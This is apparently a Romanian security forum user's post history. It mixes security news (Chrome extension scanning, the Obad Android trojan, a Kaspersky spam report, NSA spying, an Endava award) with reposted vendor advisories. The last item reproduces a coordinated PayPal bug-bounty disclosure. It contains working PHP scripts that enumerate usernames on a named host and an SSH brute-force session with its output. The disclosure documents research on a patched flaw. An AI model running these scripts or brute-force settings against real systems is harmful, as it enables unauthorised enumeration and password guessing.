Jump to content

Matt

Active Members
 View Profile  See their activity

  • Posts

    1773

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by Matt

  1. Matt
    Ca un raspuns la valul de extensii infectate sau ce pun un pericol serios asupra intimitatii online a utilizatorilor Google Chrome, cei de la Google au introdus scanarea extensiilor si a celorlalte elemente disponibile in magazinul online Chrome Web Store. Astfel, adaugarea unui element nou in magazin va dura pana la o ora, timp in care va fi scanat anti-malware. Sursa: https://plus.google.com/+GoogleChromeDevelopers/posts/3kpAu4VcP5E
  2. Matt
    Poate voi vorbi prostii.Vezi poate este vreun virus de retea.Fa-ti un DVD nou cu un Windows la altcineva in pc.Te duci la pc-ul tau scoti cablul de internet si instalezi Windows-ul cu cablul scos.Apoi dupa ce termini instalezi un Antivirus ( ex: Avast ) si vezi cum sunt lucrurile dupa asta. Eu asa as face in locul tau.
  3. Matt
    How to Boot an Ubuntu ISO from Your Hard Drive - wikiHow Este si un video.Sper ca te ajuta.Succes
  4. Matt
    h05th : Am citit primul tau post apoi nu am mai urmarit topicul decat pe sarite.Nu e cea mai simpla solutie sa formatezi tot hardul ?? Vad ca te chinui , il formatezi apoi iti instalezi un Antivirus cu licenta frumos si nu mai ai nicio problema.Repet nu am citit topicul in intregime. //EDIT : Ok , am citit tot topicul.Nu m-am confruntat niciodata cu asemenea probleme insa am rulat si eu cu 1 gb de ram pe un pc foarte vechi.Puteam folosi Microsoft Essentials care nu este nici cel mai bun antivirus insa sigur nu te vei agata de Backdoor sau ce ai tu.
  5. Matt
    Ultima amenintare pentru dispozitivele Android, Obad este un troian de tip backdoor, ce pretinde a fi o aplicatie utila si odata instalat permite atacatorilor sa iti acceseze datele oricand. Obad descarca alte aplicatii infectate, le acorda drepturi de “Device administrator”, insa ascunse de sistemul de operare. Fiind invizibile in sectiunea “device admin”, nu pot fi dezinstalate. Aici intervine noul program de la McAfee, care detecteaza orice aplicatie care si-a luat drepturile de administrator al dispozitivului tau intr-un mod invizibil. Programul te ajuta sa le dezactivezi si stergi din telefonul sau tableta ta si astfel poti scapa de probleme. Descarca noul program McAfee Security Innovations de aici si beneficiaza de noua functie: https://play.google.com/store/apps/details?id=com.mcafee.mmi Sursa FaraVirusi.Com
  6. Matt
    In luna mai, procentul de mesaje de tip spam din e-mail-urile trimise a scazut cu 2,5 puncte procentuale si a ajuns la o medie de 69.7%. Expertii Kaspersky Lab au observat o usoara crestere a numarului de e-mail-uri de tip phishing fata de luna aprilie, in timp ce 2,8% din e-mailuri, cu 0,4 puncte procentuale mai multe fata de luna anterioara, contineau atasamente malware. In incercarea de a-i convinge pe utilizatori sa deschida aceste atasamente, spammerii imitau notificari autentice ale companiilor care furnizeaza servicii de internet sau de logistica, precum Amazon, UPS sau Western Union. Cele mai tentante instrumente pentru pshisheri au ramas retelele de socializare. Majoritatea mesajelor de tip spam au provenit din doua tari – China (21,4%) si Statele Unite (16,3%). Coreea de Sud este pe locul trei in top, avand o contributie de 12% in luna mai. Spamerii au continuat sa profite de sarbatorile nationale din Statele Unite – Ziua Mamei si Memorial Day – pentru a promova diferite produse si servicii. Dupa Valentine’s Day, Ziua Mamei a fost pe locul al doilea in topul celor mai aglomerate zile pentru mesajele de tip spam cu oferte de la florarii, care au crescut semnificativ inaintea sarbatorii. Expertii Kaspersky Lab avertizeaza ca mesajele spam de genul acesta nu sunt numai un inconvenient inofensiv: informatiile personale ale utilizatorilor – inclusiv datele bancare – pot deveni tinta principala a spammer-ilor. De exemplu, in luna mai au fost trimise mai multe mesaje de tip phishing, care pareau a fi e-mail-uri din partea serviciilor de asistenta Microsoft, ce aveau ca scop furtul de informatii personale. Mesajele, care la prima vedere par a fi trimise de pe domeniul microsoft.com, sustineau ca inregistrarile utilizatorilor de „Microsoft Window” urmau sa fie suspendate din cauza faptului ca nu au fost instalate update-uri – despre care se spunea ca au fost trimise in mesaje anterioare. Destinatarilor li se transmitea sa acceseze imediat un link din e-mail pentru a evita intreruperea serviciului. Utilizatorii care s-au lasat inselati au ajuns pe un site de phishing creat special pentru a fura informatiile personale. Alte valuri de mesaje in masa contineau notificari false cu privire la premii la o loterie inexistenta, aparent organizata de Microsoft. In unele mesaje, scammerii trimiteau notificari cu privire la presupuse castiguri si le cereau destinatarilor sa ii contacteze pentru a obtine informatii suplimentare, in timp ce altele promiteau sume foarte mari de bani in schimbul platii unor costuri de administrare a castigurilor. Pe masura ce incepe sezonul de vacanta, expertii anticipeaza o crestere a numarului de notificari ce par a fi trimise din partea unor companii de renume. „Va sfatuim sa fiti precauti atunci cand primiti notificari de la orice tip de serviciu”, avertizeaza Darya Gudkova, Head of Content Analysis & Research in cadrul companiei Kaspersky Lab. „Retineti ca e-mailurile oficiale nu cer niciodata clientilor sa inregistreze sau sa trimita informatii personale sau legate de contul bancar prin intermediul unor link-uri din corpul mesajului si nici nu ameninta sa blocheze conturile. Nu accesati niciodata un link daca programul antivirus sau browser-ul l-a blocat. Fiti foarte atenti cu link-urile din mesaje. Daca acesta duce catre un website neoficial sau daca textul e-mailului prezinta adresa website-ului oficial, in timp ce link-urile duc spre o alta pagina, este posibil sa aveti de-a face cu o actiune de phishing. Daca aveti orice indoiala cu privire la autenticitatea unui e-mail, contactati serviciul de asistenta al organizatiei care pare sa fi trimis e-mailul pentru a verifica daca a trimis intr-adevar mesajele”, a explicat Darya Gudkova. Versiunea completa a raportului de spam din luna mai 2013 este disponibil pe securelist.com. Sursa FaraVirusi.Com
  7. Matt
    Franta, Italia si Grecia se aflau intre cele 38 de "tinte" supravegheate de Agentia Nationala americana pentru Securitate (NSA), potrivit unor documente comunicate ziarului britanic The Guardian de catre fostul consultant al acestei agentii Edward Snowden. Unul dintre documentele NSA dezvaluie ca activitatile de spionaj electronic ale Agentiei vizau ca tinte ambasade la Washington si reprezentante ale acestor tari la ONU, dezvaluie The Guardian in editia sa online, potrivit AFP. Tentative de ascultare au vizat ambasadele Frantei, Italiei si Greciei la Washington. Japonia, Mexicul, Coreea de Sud, India si Turcia au fost, de asemnea, citate intre tintele operatiunilor de supraveghere electronica, intr-un document datand din 2010. Saptamanalul german Der Spiegel a scris anterior, sambata, bazandu-se pe documente furnizate de Edward Snowden, ca NSA, acuzata de spionarea comunicatiilor electronice la nivel mondial prin programul PRISM, a vizat ca tinte sedii ale unor institutii UE la Bruxelles si Ambasada Uniunii la Washington. Delegatia UE la ONU a facut obiectul unor supravegheri similare, potrivit Der Spiegel. Ce urmareau spionii informatici americani Actiunea de spionaj a implicat nu doar microfoane instalate in cladire, ci si despre o infiltrare in reteaua informatica, permitandu-i sa citeasca e-mailuri si documente interne. Potrivit documentelor confidentiale citate de revista germana, europenii sunt desemnati in mod explicit ca "tinte de atacat". Potrivit documentelor consultate de The Guardian, operatiunea care a vizat ca tinta UE a avut ca obiectiv sa afle mai multe despre disensiunile dintre statele membre UE. "Operatiunea de supraveghere a reprezentantei franceze la ONU a fost numita "BLACKFOOT", iar cea vizand ambasada Frantei la Washington "WABASH". Ambasada Italiei la Washington a fost vizata de o operatiune al carei nume de cod a fost "BRUNEAU". UE, Franta si Germania au cerut duminica explicatii asupra acestor acuzatii de spionare a UE. Sursa Business24.Ro
  8. Matt
    Endava, una dintre principalele companii de servicii IT din regiune, cu sediul central la Londra si centre de dezvoltare in Romania, la Cluj-Napoca, Iasi si Bucuresti, a fost nominalizata intre primele trei companii pentru calitatea serviciilor de suport IT furnizate, in clasamentul IT Service Excellence Awards 2013, la categoria Best Managed Service Desk, realizat de catre Service Desk Institute, una dintre cele mai prestigioase asociatii profesionale din domeniul serviciilor IT din Europa. Pozitionarea in clasament atesta abordarea inovativa in managementul echipei de Service Desk si un nivel ridicat de excelenta si profesionalism al serviciilor furnizate. Acest rezultat in clasamentul SDI - aflat la cea de-a 19-a editie - este una dintre cele mai ravnite distinctii de catre companiile din industria de servicii de suport IT din Europa. „In ultimii ani, echipa de Service Desk a crescut ca numar si ca valoare a activitatii, astfel incat acum este primul punct de contact pentru o gama tot mai larga de clienti cu cerinte tot mai multe si mai specifice. Investitiile noastre in dezvoltare profesionala prin Endava University, in programe de satisfactie a clientilor si investitiile permanente in sistemele de management al calitatii serviciilor, ne permit sa furnizam serviciile de suport la nivelul solicitat de clientii nostri”, a declarat cu aceasta ocazie John Cotterell, CEO Endava. Echipa de Service Desk a Endava face parte din divizia de Managed Services a companiei, care in prezent contribuie cu peste 11 milioane de lire sterline la cifra de afaceri anuala a Endava. Echipa de Service Desk a fost formata in 2007, la Cluj-Napoca, numara in prezent peste 30 de analisti si asigura suportul necesar unor companii de diferite dimensiuni, furnizand servicii de suport de nivel 1 si solutionand solicitarile din partea utilizatorilor sistemelor IT din aceste companii. Lunar, membrii echipei de Service Desk raspund la aproximativ 7.500 de solicitari, rezolvand direct in medie 80% dintre acestea, in timp ce diferenta de 20% dintre solicitari este directionata catre echipele de suport de nivel 2 si 3. In ultimul an, Endava a castigat proiecte noi in cadrul departamentului de Managed Services, in timp ce veniturile si solicitarile pentru servicii de Service Desk au crescut cu peste 25%, iar nivelul de satisfactie al clientilor depaseste 90%. „In urmatoarele 6 luni intentionam sa crestem echipa Service Desk din Cluj pana la cel putin 50 de analisti, pentru a raspunde cresterii numarului de clienti, iar in plus vom continua sa angajam si ingineri de suport si consultanti IT, astfel incat in curand sa depasim pragul de 100 de angajati in divizia de Managed Services in Romania. Mai mult de jumatate dintre analistii de la Service Desk au promovat, in ultimele 18 luni, in pozitii de Service Delivery Manager, team leaders, manageri de proiecte sau ingineri de suport nivelul 2” a explicat Andrei Pantelimon, CEE Operations Manager in divizia de Managed Services a Endava. Echipa de Service Desk Endava interactioneaza cu un numar mai mare de clienti decat orice alt departament al companiei. Alexander Mann Solutions, companie de recrutare cu operatiuni la nivel global, este unul dintre clientii cheie ai Endava, care recent a implementat un program de tranzitie a sistemului IT, conceput de Endava, prin care angajatii Alexander Mann Solutions pot sa acceseze servicii IT de oriunde si de pe orice dispozitiv, fiecare utilizare putand fi monitorizata. „Cu ajutorul Endava, acum utilizam o infrastructura IT in cloud, de ultima ora si extrem de eficienta, ceea ce reduce costurile cu sistemele IT. Serviciile Endava au permis totodata si imbunatatirea semnificativa a nivelului serviciilor de suport, iar feedbackul de la angajatii nostri din toate locatiile noastre la nivel international este extrem de favorabil. in prezent, prin serviciile furnizate de Endava, asiguram o rata de rezolvare de peste 80% a solicitarilor IT inca de la primul contact cu echipa de suport”, a declarat John Wainwright, Head of IT Global & Facilities Alexander Mann Solutions. Detalii suplimentare si lista companiilor finaliste din acest an este disponibila la: Winners 2013 | SDI Despre Endava Endava este o companie privata de servicii IT infiintata in anul 2000. Endava are 8 sedii in Marea Britanie, Statele Unite, Romania si Republica Moldova si o cifra anuala de afaceri de peste 29,8 de milioane de lire sterline/37 de milioane de euro. Endava livreaza solutii de business si servicii informatice in special pentru organizatii mari din domeniile bancar, financiar, telecomunicatii, media, sport & entertainment si servicii profesionale. Endava este specializata in livrarea de servicii precum: Dezvoltare Software, Digital Media, Testare Software, Management Aplicatii Software, Servicii Cloud. Sursa: totalPR relatii publice / Agentie de relatii publice | totalPR
  9. Matt
    Description : Mandriva Linux Security Advisory 2013-186 - Updated puppet packages fix remote code execution vulnerability. When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload. Author : Mandriva Source : Mandriva Linux Security Advisory 2013-186 ? Packet Storm Code : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2013:186 http://www.mandriva.com/en/support/security/ _______________________________________________________________________ Package : puppet Date : June 28, 2013 Affected: Business Server 1.0 _______________________________________________________________________ Problem Description: Updated puppet packages fix remote code execution vulnerability When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload (CVE-2013-3567). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3567 http://advisories.mageia.org/MGASA-2013-0187.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 1/X86_64: 1532146f04c77b3a71e01bbbaa929d2c mbs1/x86_64/puppet-2.7.22-1.mbs1.noarch.rpm e6b6a20c32faea8808d83364b96236ae mbs1/x86_64/puppet-server-2.7.22-1.mbs1.noarch.rpm 713d5666406f8bdf86f0e7bd6bf54bfa mbs1/SRPMS/puppet-2.7.22-1.mbs1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFRzVQFmqjQ0CJFipgRAmR6AJ0euIEDVy8e9FKN6zUjkZepG0SGuQCfTyUM uT8v/zkgEMTfhKoDVS4hLTg= =lnWK -----END PGP SIGNATURE-----
  10. Matt
    Description : Debian Linux Security Advisory 2717-1 - Jon Erickson of iSIGHT Partners Labs discovered a heap overflow in xml-security-c, an implementation of the XML Digital Security specification. The fix to address CVE-2013-2154 introduced the possibility of a heap overflow in the processing of malformed XPointer expressions in the XML Signature Reference processing code, possibly leading to arbitrary code execution. Author : Debian Source : Debian Security Advisory 2717-1 ? Packet Storm Code : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2717-1 security@debian.org http://www.debian.org/security/ Salvatore Bonaccorso June 28, 2013 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : xml-security-c Vulnerability : heap overflow Problem type : local (remote) Debian-specific: no CVE ID : CVE-2013-2210 Debian Bug : 714241 Jon Erickson of iSIGHT Partners Labs discovered a heap overflow in xml-security-c, an implementation of the XML Digital Security specification. The fix to address CVE-2013-2154 introduced the possibility of a heap overflow in the processing of malformed XPointer expressions in the XML Signature Reference processing code, possibly leading to arbitrary code execution. For the oldstable distribution (squeeze), this problem has been fixed in version 1.5.1-3+squeeze3. For the stable distribution (wheezy), this problem has been fixed in version 1.6.1-5+deb7u2. For the unstable distribution (sid), this problem has been fixed in version 1.6.1-7. We recommend that you upgrade your xml-security-c packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJRzaDrAAoJEHidbwV/2GP+ypYQAKE0uiu5ldrC60pukEYiU1d8 epTenJbhaYhzb2FxKETjMtLI+46nooId6ptCCWXwwVZ1PfhaaTO6CJkPuk9MJTZa K8Du0hfa8aNp6Ahp+3/zEEnnwvRVW2EoFB7BHXc1DOY+fmGuSoL1Yty5jwAiOJd3 NjcuJMWcJk8TtYEYH3JsNQiJVliR67YlxgYKnpFKfCtJu/NeVxgFZymz6u6bkeVU 19XZW+xOypFGPi0H3w5sZEd5OZIo7lhettUHg1IJOAVulX3f7Ad1cxOhtns2HJoq 3qpcKm9iMr5aQ0c1qKFWhdiMecrxBd7TOjsPJ1lBpm6j5mT0uKgfTq/oPvh6jLHN bnhBdV65wkhb13umgGLwxoHDdk0Gd1prTy9i3lAnJrXCptZ3Ye4vIjNfOk7DMnV4 iy4fj+Maky5U1EzdOcst0NkMkk/Nx71QVdwDd5D/6pMVogNDpYm9jHrjkkhrH2Hq vZ3ja9SnRL8qXK7zPWZ3Ub2CjcJLxtN9p0tK4M9U/4DalIZry0gAASiy3887FS2h Z9Y1TN8Sga3LMKL2FzYzERlt0wsHpilDqVUcPxBk7p5pA65TjRHIxK9fxoFwownD yPU+nb70th8vyU9jJH/+sidPau07Zk1sqxS79Ndf1z9YD1/KyMU7lOIkVXH4KNO4 Fa+JknxCcr25IQJXNB31 =fVio -----END PGP SIGNATURE-----
  11. Matt
    Description : The PayPal Hong Kong marketing site suffers from information disclosure, user enumeration, and bruteforcing vulnerabilities. Author : Karim H.B Source : PayPal Enumeration / Information Disclosure ? Packet Storm Code : Title: ====== PayPal Bug Bounty MKT HK #63 - Multiple Vulnerabilities Date: ===== 2013-06-26 References: =========== http://www.vulnerability-lab.com/get_content.php?id=852 PayPal Security UID: EIbecaC VL-ID: ===== 852 Common Vulnerability Scoring System: ==================================== 2.9 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official PayPal Inc Marketing service application system. Report-Timeline: ================ 2013-02-03: Researcher Notification & Coordination (Karim Boudra) 2013-02-05: Vendor Notification (PayPal Inc Security Incident Team - Bug Bounty Program) 2013-03-12: Vendor Response/Feedback (PayPal Inc Security Incident Team - Bug Bounty Program) 2013-05-24: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward) 2013-06-26: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== PayPal Inc Product: Marketing Application & Service (HK) 2013 Q1 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== While analysing www.paypal-marketing.com.hk Server ,we had identified the following vulnerabilities ... 1) Apache username enumeration The scope of this vulnerability is to verify if it is possible to collect a set of valid apache usernames by interacting with a apache feature. This test will be useful for the SSH brute force testing, in which we verify if, given a valid username, it is possible to find the corresponding password. Often, CPANEL reveal when a username exists on Apache, either as a consequence of a misconfiguration or as a design decision. For example, when we request a wrong username, we receive an HTTP Response message that states that either the username is present on the system or not. The information obtained can be used by an attacker to gain a list of valid users on Apache. This information can be used to attack the SSH Service, for example, through a brute force using default password attack. Testing via example In a black box testing, we know nothing about the specific username, error messages on apache server. If the apache server is vulnerable, we receive a response message that reveals, directly or indirectly, some information useful for enumerating users. For example ... https://www.paypal-marketing.com.hk/~root - we receive from web server: 403 Forbidden https://www.paypal-marketing.com.hk/~vulnerabilitylab - we receive from web server: 302 Found https://www.paypal-marketing.com.hk/~operator - we receive from web server: 403 Forbidden As we can see above, when we provide a username to apache server, we see a message indication that an error has occurred in the URL. In the first case we has provided a valid username ,In the second a invalid username,In the third a valid username . In first case the user exists, but we cannot view the web page, in second case instead the user `vulnerabilitylab` doesn’t exist the server redirect our browser to `https://www.paypal-marketing.com.hk/en/business/merchant-solutions.php` ,Collecting this information we can enumerate the users. Let us analyze the Web page Titles: We can receive useful information on Title of web page, where we can obtain a specific error code or messages that reveal if the problems are on username or password. For instance, if the request username doesn`t exist whose title is similar to: Invalid user : we receive <title>302 Forbidden</title> Valid user : we receive <title>403 Forbidden</title> or <title>200 Forbidden</title> So After tests, we was able to identify if a given username is valid or not . In the above sample we can create simple script that used a username wordlist and submit a request with HTTPS packets to automate a web query to discern valid usernames. To create a script we can also use PHP and openssl. Other possibilities are: - username associated with credit card numbers, username associated to hidden vulnerable application, or in general numbers with a pattern. - userIDs associated with real names, e.g. if Freddie Mercury has a username of `fmercury`, then you might guess Roger Taylor to have the userID of `rtaylor`. Again, we can guess a username from from Google information gathering, for example, from a specific domain. Google can help to find domain users through specific queries or through a simple shell script or tool. 2) CGI Script Information Leak (Information Disclosure & System usernames enumeration) The vulnerability is a weakness in an CGI script (frequently a broken or missing control) that enables an attack to succeed. and it is located on : HOST : https://www.paypal-marketing.com.hk FILE : /cgi-sys/entropysearch.cgi?user={username} Vulnerable Parameters : user The scope of this vulnerability is to enumerate a list of system usernames & gathering information such as PATHFOLDER for a given username https://www.paypal-marketing.com.hk/cgi-sys/entropysearch.cgi?user={username} As you can see above if we replace username by valid username ,we get a not null PATH FOLDER value for : 1- in the case of username is equal to `root`, we receive the following message : Could not chdir into /root/: Permission denied 2- in the case of username is equal to ``operator``, we receive following message : Could not chdir into /var/spool/mqueue/.htmltemplates: Permission denied 3- in case of username doesn`t exist like ``vulnerability`` Could not chdir into /.htmltemplates: No such file or directory it was easy to collect path folder - using regular expression `#Could not chdir into (.*?)/.htmltemplates:# - using string splitting (see the POC2) This exploitation can be used to enumerate many informations like (System usernames,PATH folder,installed Products & services) to exploit this vulnerability ,we created simple script that used a username wordlist and submit a request with HTTPS packets to automate a web query to discern valid usernames. The test script is coded on PHP and requires openssl. After execution of our POC2 : root@bt:~/paypalbugbounty/1337l33t# ls allusernames.txt PATH@POC@Disclosure.txt root@bt:~/paypalbugbounty/1337l33t# php PATH/@POC/@Disclosure.txt root:/root daemon:/sbin bin:/bin adm:/var/adm shutdown:/sbin sync:/sbin games:/usr/games lp:/var/spool/lpd mail:/var/spool/mail news:/etc/news uucp:/var/spool/uucp sshd:/var/empty/sshd nobody:/ mysql:/var/lib/mysql apache:/var/www pcap:/var/arpwatch xfs:/etc/X11/fs As you can see above if we replace username by valid username ,we get a not null PATH FOLDER value for : Here the list of collected usefull Information: Usernames: root,daemon,bin,adm,shutdown,sync,games,lp,mail,news,uucp,sshd,nobody,mysql,apache,pcap,xfs Installed products: apache,mysql,x11,arpwatch,sshd 3) SSH SERVER is vulnerable to Bruteforce Threads (Misconfiguration) SSH (Secure Socket Shell) is a secure remote access protocol. Multiple connection attempts from the same source address to the same destination address in a short amount of time are a sign of a brute force attempt. A remote attacker may be using an automated program to attempt to guess the login credentials and gain access to the victim`s system. The scope of this advisory is to verify if it is possible to collect a set of valid system usernames by interacting with a cpanel feature. This test will be useful for the SSH brute force testing, in which we verify if, given a valid username, it is possible to find the corresponding password. Often, CPANEL reveal when a username exists on system, either as a consequence of a misconfiguration or as a design decision. For example, when we request a wrong username, we receive an HTTP Response message that states that either the username is present on the system or not. The information obtained can be used by an attacker to gain a list of valid users on system. This information can be used to attack the SSH Service, for example, through a brute force using default password attack. Proof of Concept: ================= 1) POC for Apache username enumeration <?php error_reporting(0); // Paypal Apache username ennumeration on HTTPS://www.paypal-marketing.com.hk with SSH enabled // Require activation of openssl module on php.ini $HOST="www.paypal-marketing.com.hk"; $PARENTPATH="/~"; $list=file("allusernames.txt"); foreach ($list as $user) { $user=trim($user); $PATH=$PARENTPATH.$user; $data=user_exist($user); if (@preg_match("#403 Forbidden#", $data) or @preg_match("#200 Found#", $data)) { echo "[".$user."] - Account Found \n"; } } function user_exist($username){ $result=Connect(); return $result; } function Connect(){ global $PATH,$HOST; $fp = fsockopen("ssl://".$HOST,443,$errno,$errstr,30); $resultat=""; if(!$fp) {die("Error cnx");} else { $out = "GET ".$PATH." HTTP/1.1\r\n"; $out .= "Host: ".$HOST."\r\n"; $out .="User-Agent=:Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24\r\n"; $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; //fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); //fputs($fp, "Content-length: ".strlen($postdata)."\r\n"); $out.="Connection: close\r\n\r\n"; //if(isset($COOKIES)){$out.="Cookie: $cookies\r\n";} //fputs($fp, $postdata."\r\n\r\n"); fwrite($fp, $out); while(!feof($fp)) $resultat .= fgets($fp,4096); fclose($fp); } return $resultat; } ?> 2) POC CGI Script Information Leak (Information Disclosure & System usernames enumeration). <?php error_reporting(0); // Paypal user ennumeration on https://www.paypal-marketing.com.hk/cgi-sys/entropysearch.cgi?user=root // require activation of openssl module on php.ini $HOST="www.paypal-marketing.com.hk"; $PARENTPATH="/cgi-sys/entropysearch.cgi?user="; $list=file("allusernames.txt"); foreach ($list as $user) { $PATH= $PARENTPATH.trim($user); $data=user_exist($user); $data=explode('Could not chdir into ',$data); $data=explode('/.htmltemplates',$data[1]); $data=$data[0]; if($data != null){ echo trim($user).":".$data."\n"; } } function user_exist($username){ $result=Connect(); return $result; } function Connect(){ global $PATH,$HOST; $fp = fsockopen("ssl://".$HOST,443,$errno,$errstr,30); $resultat=""; if(!$fp) {die("Error cnx");} else { $out = "GET ".$PATH." HTTP/1.1\r\n"; $out .= "Host: ".$HOST."\r\n"; $out .="User-Agent=:Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24\r\n"; $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; //fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); //fputs($fp, "Content-length: ".strlen($postdata)."\r\n"); $out.="Connection: close\r\n\r\n"; //if(isset($COOKIES)){$out.="Cookie: $cookies\r\n";} //fputs($fp, $postdata."\r\n\r\n"); fwrite($fp, $out); while(!feof($fp)) $resultat .= fgets($fp,4096); fclose($fp); } return $resultat; } ?> 3) In order to automate our SSH attempts we used a framework against the ssh_login module We defined: "ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/computer/common-passwords.txt.gz" as Password wordlist "paypalusers.txt" (contains enumerated usernames from the first vulnerability) as username wordlist in order to optimize our SSH bruteforce attack ... zer0pool > use auxiliary/scanner/ssh/ssh_login zer0pool auxiliary(ssh_login) > set THREADS 24 THREADS => 24 zer0pool auxiliary(ssh_login) > set RPORT 22 RPORT => 22 zer0pool auxiliary(ssh_login) > set VERBOSE 1 VERBOSE => 1 zer0pool auxiliary(ssh_login) > set USER_AS_PASS 1 USER_AS_PASS => 1 zer0pool auxiliary(ssh_login) > set STOP_ON_SUCCESS 0 STOP_ON_SUCCESS => 0 zer0pool auxiliary(ssh_login) > set BRUTEFORCE_SPEED 5 BRUTEFORCE_SPEED => 5 zer0pool auxiliary(ssh_login) > set PASS_FILE /pentest/passwords/wordlists/common-passwords.txt PASS_FILE => /pentest/passwords/wordlists/common-passwords.txt zer0pool auxiliary(ssh_login) > set USER_FILE /root/paypalusers.txt USER_FILE => /root/paypalusers.txt zer0pool auxiliary(ssh_login) > set RHOSTS www.paypal-marketing.com.hk RHOSTS => www.paypal-marketing.com.hk zer0pool auxiliary(ssh_login) > set BLANK_PASSWORDS 1 BLANK_PASSWORDS => 1 zer0pool auxiliary(ssh_login) > run -j [*] Auxiliary module running as background job [*] 122.201.98.21:22 SSH - Starting bruteforce [*] 122.201.98.21:22 SSH - [0001/2449] - Trying: username: 'root' with password: '' [-] 122.201.98.21:22 SSH - [0001/2449] - Failed: 'root':'' [*] 122.201.98.21:22 SSH - [0002/2449] - Trying: username: 'operator' with password: '' [-] 122.201.98.21:22 SSH - [0002/2449] - Failed: 'operator':'' [*] 122.201.98.21:22 SSH - [0003/2449] - Trying: username: 'mailnull' with password: '' [-] 122.201.98.21:22 SSH - [0003/2449] - Failed: 'mailnull':'' [*] 122.201.98.21:22 SSH - [0004/2449] - Trying: username: 'root' with password: 'root' [-] 122.201.98.21:22 SSH - [0004/2449] - Failed: 'root':'root' [*] 122.201.98.21:22 SSH - [0005/2449] - Trying: username: 'operator' with password: 'operator' After somes thousend attempts ,we noticed that SSH server had no restriction for blocking ours brute force threats. We also now after the attack the access without ssh keys should be possible. Solution: ========= 2013-05-24: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward) Risk: ===== The security risk of 2 discovered vulnerabilities and 1 misconfiguration is estimated as medium. Credits: ======== Vulnerability Laboratory [Research Team] - Karim Boudra (kami@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 